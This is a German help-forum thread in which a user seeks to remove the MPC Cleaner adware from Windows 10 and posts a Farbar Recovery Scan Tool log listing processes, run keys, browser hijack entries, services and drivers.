Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Log-Analyse und Auswertung: Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML.

Antwort
Seite 1 von 4 1 23 Letzte »
Alt 19.04.2016, 12:11   #1
StOony
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Hallo liebe Helfer,

ich bin hier zum ersten mal und hoffe darauf Hilfe zu kriegen.
Mein Computer ist voller Malware, glaub ich zumindest.

Habe ein Programm namens MPC Cleaner der sich nicht entfernen lässt.

Zur Information was ich alles gemacht habe.

1: Anti Virus Programm laufen lassen
2: Adw Cleaner laufen lassen
3: Es in der Systemsteuerung unter Programme Deinstallieren gesucht, aber hab es nicht gefunden, weil es irgendwie nicht da ist.

Ich finde kein Ordner mit dem Namen MPC, nur ist es dauerhaft unten in meiner Leiste, da wo mein Avira und so auch ist, also die Programme die dauernd laufen(unten Rechts).

Ich kann nichtmal das Programm öffnen, es Startet immer mit, wenn ich mein PC anmache nur kriege ich es da nicht weg.

Habe einen WIN 10 Pro 64 Bit Systeme.

Wie gesagt bin zum ersten mal hier, werde jetzt meine Logs in Avira noch mit rein nehmen und dieses FRST

Danke jetzt schonmal

MFG StOony

PS: Bei Google Chrome ist die Seite MPC auch immer als Startseite, die kriege ich da auch nicht weg.

Alt 19.04.2016, 13:03   #2
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Hi und

Logs bitte nicht anhängen, notfalls splitten und über mehrere Postings verteilt posten

Lesestoff:
Posten in CODE-Tags
Die Logfiles anzuhängen oder sogar vorher in ein ZIP, RAR oder 7Z-Archiv zu packen erschwert mir massiv die Arbeit.
Auch wenn die Logs für einen Beitrag zu groß sein sollten, bitte ich dich die Logs direkt und notfalls über mehrere Beiträge verteilt zu posten.
Um die Logfiles in eine CODE-Box zu stellen gehe so vor:
  • Markiere das gesamte Logfile (geht meist mit STRG+A) und kopiere es in die Zwischenablage mit STRG+C.
  • Klicke im Editor auf das #-Symbol. Es erscheinen zwei Klammerausdrücke [CODE] [/CODE].
  • Setze den Curser zwischen die CODE-Tags und drücke STRG+V.
  • Klicke auf Erweitert/Vorschau, um so prüfen, ob du es richtig gemacht hast. Wenn alles stimmt ... auf Antworten.
__________________

__________________
Alt 19.04.2016, 13:22   #3
StOony
 
Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen - Standard

Windows 10 : MPC Cleaner lässt sich nicht richtig entfernen


Ups, tut mir leid.
Kann es leider nicht mehr Editieren, poste es jetzt hier mit.

FRST:
Code:
ATTFilter
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version:18-04-2016
durchgeführt von Harun (Administrator) auf HARUN-PC (19-04-2016 13:05:47)
Gestartet von C:\Users\Harun\Downloads
Geladene Profile: Harun (Verfügbare Profile: Harun & aysec & faruk)
Platform: Windows 10 Pro (X64) Sprache: Deutsch (Deutschland)
Internet Explorer Version 11 (Standard-Browser: Chrome)
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: FRST Tutorial - How to use Farbar Recovery Scan Tool - Malware Removal Guides and Tutorials

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\sched.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avguard.exe
(DotC United Inc) A:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe
() C:\Windows\SysWOW64\PnkBstrA.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avshadow.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesApp64.exe
(DotC United Inc) A:\Program Files (x86)\MPC Cleaner\MPCTray.exe
(DotC United Inc) A:\Program Files (x86)\MPC Cleaner\MPCTray64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avgnt.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\Common\avguix.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Launcher\Avira.Systray.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Avira Operations GmbH & Co. KG) C:\Program Files (x86)\Avira\Antivirus\avcenter.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\1\avgdiagex.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\Framework\1\avgdiagex.exe


==================== Registry (Nicht auf der Ausnahmeliste) ===========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8492800 2015-07-29] (Realtek Semiconductor)
HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\RadeonSettings.exe [5006536 2016-04-04] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [iTunesHelper] => A:\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.)
HKLM-x32\...\Run: [avgnt] => C:\Program Files (x86)\Avira\Antivirus\avgnt.exe [807392 2016-03-12] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Avira SystrayStartTrigger] => C:\Program Files (x86)\Avira\Launcher\Avira.SystrayStartTrigger.exe [66328 2016-01-27] (Avira Operations GmbH & Co. KG)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2072928 2014-10-31] (Wondershare)
HKLM-x32\...\Run: [AvgUi] => C:\Program Files (x86)\AVG\Framework\Common\avguirnx.exe [186640 2016-04-14] (AVG Technologies CZ, s.r.o.)
HKLM-x32\...\Run: [PlaysTV] => C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv_launcher.exe [71440 2016-04-05] (Plays.tv, LLC)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe [58640 2016-04-05] (Raptr, Inc)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Steam] => "A:\Steam\steam.exe" -silent
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify Web Helper] => C:\Users\Harun\AppData\Roaming\Spotify\SpotifyWebHelper.exe [1524336 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [BingSvc] => C:\Users\Harun\AppData\Local\Microsoft\BingSvc\BingSvc.exe [144008 2015-11-12] (© 2015 Microsoft Corporation)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [Spotify] => C:\Users\Harun\AppData\Roaming\Spotify\Spotify.exe [6805616 2016-03-27] (Spotify Ltd)
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8813784 2016-03-11] (Piriform Ltd)
IFEO\playstv_launcher.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\raptrstub.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
IFEO\skype.exe: [Debugger] "C:\Program Files (x86)\AVG\AVG PC TuneUp\TUAutoReactivator64.exe"
Startup: C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xfire2.bat [2016-04-10] ()

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{f44a65a3-dc5f-4cc2-bb7a-f4d941196cd5}: [DhcpNameServer] 192.168.178.1

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\ssv.dll [2015-07-29] (Oracle Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\jp2ssv.dll [2015-07-29] (Oracle Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF NewTab: hxxp://www.yoursearching.com/newtab/?type=nt&ts=1457449062&z=c0daee2b39051a59099a9edgcz9wcm9z2z6t7eaqeo&from=face&uid=SAMSUNGXSSDX830XSeries_S0XXNEAC500477
FF DefaultSearchEngine: yessearches
FF SearchEngineOrder.3: Bing 
FF SelectedSearchEngine: yessearches
FF Homepage: search.mpc.am
FF Keyword.URL: hxxp://www.bing.com/search?FORM=SK2MDF&PC=SK2M&q=
FF Plugin: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelogx64.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] ()
FF Plugin-x32: @esn/npbattlelog,version=2.7.1 -> C:\Program Files (x86)\Battlelog Web Plugins\2.7.1\npbattlelog.dll [2015-04-30] (EA Digital Illusions CE AB)
FF Plugin-x32: @java.com/DTPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\dtplugin\npDeployJava1.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.51.2 -> C:\Program Files (x86)\Java\jre1.8.0_51\bin\plugin2\npjp2.dll [2015-07-29] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin HKU\S-1-5-21-2630849102-760198568-3561441068-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Harun\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-08-28] (Unity Technologies ApS)
FF user.js: detected! => C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\user.js [2016-04-11]
FF user.js: detected! => C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js [2016-04-11]
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com [2016-04-19] [ist nicht signiert]
FF Extension: Kein Name - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\firefox@browser-security.de.xpi [nicht gefunden]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\abs@avira.com [2015-10-26] [ist nicht signiert]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\Biuc7STG.default\Extensions\bingsearch.full@microsoft.com [2015-09-24] [ist nicht signiert]
FF Extension: GsearchFinder - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\@E9438230-A7DF-4D1F-8F2D-CA1D0F0F7924.xpi [2016-03-01]
FF Extension: Avira Browser Safety - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\abs@avira.com [2016-03-08] [ist nicht signiert]
FF Extension: Bing Search - C:\Users\Harun\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\bingsearch.full@microsoft.com [2016-03-08] [ist nicht signiert]

Chrome: 
=======
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=de-de
CHR StartupUrls: Default -> "hxxps://www.google.de/"
CHR Profile: C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-21]
CHR Extension: (YouTube) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-24]
CHR Extension: (Adblock Plus) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2016-03-08]
CHR Extension: (Adblock für Youtube™) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\cmedhionkhpnakcndndgjdbohmhepckk [2016-03-05]
CHR Extension: (Google-Suche) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-26]
CHR Extension: (Google Docs Offline) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (AdBlock) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-04-15]
CHR Extension: (Sniper Team Game Collection) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\hclgbbaloijjnkpigapgmocdpoblnlec [2016-02-07]
CHR Extension: (Top Eleven) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\ljphpjlafmmdmegmfbkacafhbegjfkkn [2015-07-29]
CHR Extension: (Chrome Web Store-Zahlungen) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR Extension: (Google Mail) - C:\Users\Harun\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-07-29]
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S4 amdacpusrsvc; C:\Program Files\AMD\{920DEC42-4CA5-4d1d-9487-67BE645CDDFC}\amdacpusrsvc.exe [121856 2016-04-03] (Advanced Micro Devices) [Datei ist nicht signiert]
S2 AntiVirMailService; C:\Program Files (x86)\Avira\Antivirus\avmailc7.exe [955736 2016-03-12] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\Antivirus\sched.exe [466504 2016-03-12] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\Antivirus\avguard.exe [466504 2016-03-12] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\Antivirus\avwebg7.exe [1424880 2016-03-12] (Avira Operations GmbH & Co. KG)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 avgsvc; C:\Program Files (x86)\AVG\Framework\Common\avgsvca.exe [1074448 2016-04-14] (AVG Technologies CZ, s.r.o.)
R2 Avira.ServiceHost; C:\Program Files (x86)\Avira\Launcher\Avira.ServiceHost.exe [260456 2016-01-27] (Avira Operations GmbH & Co. KG)
S4 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
S4 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
S4 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26680 2016-02-18] (Hewlett-Packard Company)
R2 MPCProtectService; A:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe [350688 2016-03-23] (DotC United Inc)
S4 Origin Client Service; A:\Origin\OriginClientService.exe [2007048 2015-08-01] (Electronic Arts)
S4 PlaysService; C:\Program Files (x86)\Raptr Inc\PlaysTV\plays_service.exe [32528 2016-04-05] (Plays.tv, LLC)
R2 PnkBstrA; C:\WINDOWS\system32\PnkBstrA.exe [76152 2015-08-01] ()
R2 PnkBstrA; C:\WINDOWS\SysWOW64\PnkBstrA.exe [76152 2015-08-02] ()
R2 TuneUp.UtilitiesSvc; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesService64.exe [4584208 2016-03-29] (AVG Technologies CZ, s.r.o.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-07-10] (Microsoft Corporation)

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 amdacpksd; C:\WINDOWS\system32\drivers\amdacpksd.sys [296648 2016-04-04] (Advanced Micro Devices)
S0 amdkmafd; C:\Windows\System32\drivers\amdkmafd.sys [40720 2015-07-28] (Advanced Micro Devices, Inc.)
R3 AtiHDAudioService; C:\Windows\system32\drivers\AtihdWT6.sys [111120 2016-03-01] (Advanced Micro Devices)
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [128664 2016-03-12] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [137952 2016-03-12] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2015-12-01] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [68936 2016-03-12] (Avira Operations GmbH & Co. KG)
S3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [194320 2016-04-12] (Intel Corporation)
R1 MPCKpt; C:\Windows\System32\DRIVERS\MPCKpt.sys [60136 2016-03-23] (DotC United Inc)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [587264 2015-07-10] (Realtek                                            )
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-03-29] (AVG Netherlands B.V.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [35880 2016-01-01] (Wellbia.com Co., Ltd.)
U3 idsvc; kein ImagePath
S3 MSICDSetup; \??\D:\CDriver64.sys [X]
S3 NTIOLib_1_0_C; \??\D:\NTIOLib_X64.sys [X]
S1 ttqbdlfv; \??\C:\WINDOWS\system32\drivers\ttqbdlfv.sys [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; kein ImagePath
S3 XFDriver64; \??\C:\Program Files (x86)\Xfire2\XFDriver64.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-04-19 13:05 - 2016-04-19 13:06 - 00018401 _____ C:\Users\Harun\Downloads\FRST.txt
2016-04-19 13:05 - 2016-04-19 13:05 - 00000000 ____D C:\FRST
2016-04-19 13:04 - 2016-04-19 13:05 - 02375680 _____ (Farbar) C:\Users\Harun\Downloads\FRST64.exe
2016-04-19 12:54 - 2016-04-19 12:54 - 00083140 _____ C:\Users\Harun\Desktop\Ereignisse.txt
2016-04-19 12:47 - 2016-04-19 12:47 - 03286400 _____ (Enigma Software Group USA, LLC.) C:\Users\Harun\Downloads\Nicht bestätigt 326517.crdownload
2016-04-19 12:44 - 2016-04-19 12:44 - 00016148 _____ C:\WINDOWS\system32\HARUN-PC_Harun_HistoryPrediction.bin
2016-04-19 12:44 - 2016-04-19 12:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
2016-04-19 12:39 - 2016-04-19 12:43 - 00000000 ____D C:\AdwCleaner
2016-04-19 12:39 - 2016-04-19 12:39 - 03683904 _____ C:\Users\Harun\Downloads\adwcleaner_5.112.exe
2016-04-19 12:39 - 2016-04-19 12:39 - 00001391 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files\iPod
2016-04-19 12:39 - 2016-04-19 12:39 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\WINDOWS\System32\Tasks\Apple
2016-04-19 12:38 - 2016-04-19 12:38 - 00000000 ____D C:\Program Files (x86)\Apple Software Update
2016-04-15 17:10 - 2016-03-29 08:40 - 03587584 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-04-15 17:10 - 2016-03-29 08:40 - 01381376 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-04-15 17:10 - 2016-03-25 09:38 - 24593408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-04-15 17:10 - 2016-03-25 09:25 - 12505600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-04-15 17:10 - 2016-03-25 09:14 - 07525376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-04-15 17:10 - 2016-03-25 09:13 - 19325440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-04-15 17:10 - 2016-03-25 08:55 - 11263488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-04-15 17:10 - 2016-03-25 08:54 - 05457408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-04-15 17:10 - 2016-03-16 06:56 - 03467784 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSService.dll
2016-04-15 17:10 - 2016-03-16 06:56 - 01022664 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-04-15 17:10 - 2016-03-16 06:56 - 00861512 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 02495768 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 01951872 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-04-15 17:10 - 2016-03-16 06:55 - 01299032 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-04-15 17:10 - 2016-03-16 06:55 - 01127024 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-04-15 17:10 - 2016-03-16 06:55 - 00601344 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-04-15 17:10 - 2016-03-16 06:54 - 00595016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 22610328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 00801632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-04-15 17:10 - 2016-03-16 06:46 - 00658568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2016-04-15 17:10 - 2016-03-16 06:45 - 00140536 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2016-04-15 17:10 - 2016-03-16 06:41 - 00607416 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-04-15 17:10 - 2016-03-16 06:41 - 00208736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-04-15 17:10 - 2016-03-16 06:39 - 00983904 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-04-15 17:10 - 2016-03-16 06:37 - 01010016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-04-15 17:10 - 2016-03-16 06:21 - 01767000 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:21 - 01531888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 21088728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
